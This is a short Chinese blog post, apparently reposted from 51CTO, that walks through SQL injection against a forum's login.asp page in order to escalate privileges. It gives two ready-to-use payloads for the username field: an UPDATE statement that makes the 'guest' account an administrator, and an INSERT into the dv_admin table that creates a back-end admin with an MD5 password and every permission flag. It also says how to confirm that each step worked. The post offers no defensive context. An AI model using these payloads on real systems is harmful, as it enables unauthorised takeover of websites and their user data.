在用户名处写入“';update dv_user set usergroupid=1 where username='guest'--”密码我就用正确的来写然后写好后登陆看到反回的信息
我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“guest”已经为管理员了。
我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“guest”已经为管理员了。
现在我们已经是前台管理员了。
那么怎样才能让我们的帐户具有后台权限呢?我们继续来到login.asp这个登陆页面。在用户名处写入guest';insert into dv_admin (username,password,flag,adduser) values('guset','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','guest')--
49ba59abbe56e057为MD5加密后的密码
成功登陆的话 就说明提权成功
本文转自 小王 51CTO博客,原文链接:http://blog.51cto.com/xiaowang/300788,如需转载请自行联系原作者
